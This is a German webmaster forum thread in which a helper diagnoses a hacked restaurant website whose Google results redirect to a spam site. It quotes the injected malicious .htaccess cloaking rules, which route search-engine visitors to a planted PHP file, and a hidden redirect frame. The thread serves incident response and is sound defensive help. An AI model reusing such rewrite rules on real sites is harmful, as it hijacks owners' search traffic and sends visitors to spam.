Notfall. Kann jemand helfen?

[Trixi.com]

Guten Abend,

vielleicht kann jemand helfen: Eben rief mich ein Kumpel an, der ein kleines Restaurant betreibt unter la/caset/a.org - und wenn man auf die Seite geht mit dem Browser, wird auch alles korrekt angezeigt.

Geht man allerdings zu Google.es und sucht z.B. nach la caseta migdia kommt ganz oben die Domain laca/s/eta/org - aber die description ist nicht seine und der Klick auf dsa Result leitet um auf pap/erhelp.org

Siehe Attachs

Hat jemand auf die Schnelle eine Idee, was das sein kann?

Herzlichen Dank

Gruss

Gerald

 

[Trixi.com]

Ergänzung: Da ist ja ne Whoisprotection drauf. Mein Kumpel hat keine Ahnung wo er die Domain hatte, nicht einmal wo er gehosted war...das hat ihm irgendjemand gemacht, der "verschwunden" ist.

Mir sieht es so aus, als ob er die Domain nicht verlängert hat, jemand hat die gesnapped, umgeleitet...

Was ich nicht raffe, ist warum seine Seite kommt, wenn man normal ueber den Browser reingeht....

Raetselhaft. Mir jedenfalls.

 

[akropolis]

sieht nicht nach expire/snap aus,


Expires On

June 11, 2016

Registered On

June 11, 2004

Updated On

June 12, 2015


whois-protected war die domain schon im 2013 (siehst du unter who.is, dann "history").
aber evtl. wurde die domain auf godaddy intern umgezogen. ich gehe aber eher von einer manipulation direkt auf dem server aus (im index-file oder htaccess).

das mit der weiterleitung verstehe ich allerdings auch nicht, da wurde auf der webseite selbst etwas manipuliert (evtl. server prüfen), im quelltext ist nur ein frame zu sehen

<frameset rows="*,0" framespacing="0" border="0" frameborder="NO">
		<frame src="http://www.paperhelp.org/?pid=1965&sub_id=370" noresize="" scrolling="auto">
		</frameset>

vermutlich wurde da was hinterlegt dass die domain je nach referer weiterleitet...

 

[Trixi.com]

Herzlichen Dank, Akropolis! Zwischenzeitlich ist die verschwundene Webperson aufgetaucht und hat mir versichert, dass die Domain sich auch weiterhin in ihrem Portfolio befindet.

Sie ist aber leider partout der Meinung, dass "....wenn eine Web online sichtbar ist, diese auch korrekt funtkioniert und damit es ein Problem von Google ist".

Die wollte nix von .htaccess hören...ich habe den mal angefordert, ebenso wie die index.html....Die hat ein Email an Google geschrieben

Aber im Prinzip kann es doch eigentlich nur sein, dass jemand Zugriff auf den Server hatte und wie Du sagst an diesen Files rumgefingert hat, oder? Sehe ich eigentlich wie Du! Also auf dem Orginalserver von la/cas/eta./org meine ich.

Oder gibt es eine andere Möglichkeit?

Lieben Dank nochmal fuer Dein Input!

Gerald

 

[Trixi.com]

.htaccess: Normal ist das nicht, oder? Wir lassen den .htaccess erstmal leer, wechseln Password und das war es, oder?

RewriteEngine On


RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing) RewriteRule ^(.*)$ carbonizers-discussion.php?$1 [L]

 

[Trixi.com]

So - die .htaccess war's. Vielen Dank für die schnelle und unbürokratische Hilfe! Super! Jetzt hat es selbst die Webdesignerin geglaubt.

Komm gut ins Neue Jahr, Akropolis! Guten Rutsch. Und vielen Dank nochmals!

Gruss

Gerald

 

[akropolis]

hi
super dass es geklappt hat.
die files hast du vermutlich vom server gelöscht oder?
(carbonizers-discussion.php, evtl. noch weitere)
das müsste vorerst genügen, allerdings scheint es eine sicherheitslücke
zu geben, evtl. updates machen oder beim hoster nach logfiles fragen.
sonst passiert es früher oder später wieder.
falls es auf wordpress läuft:
https://productforums.google.com/forum/#!msg/webmasters/Ii9m2AExSXQ/fWfYer3TUp0J

ebenfalls einen guten rutsch!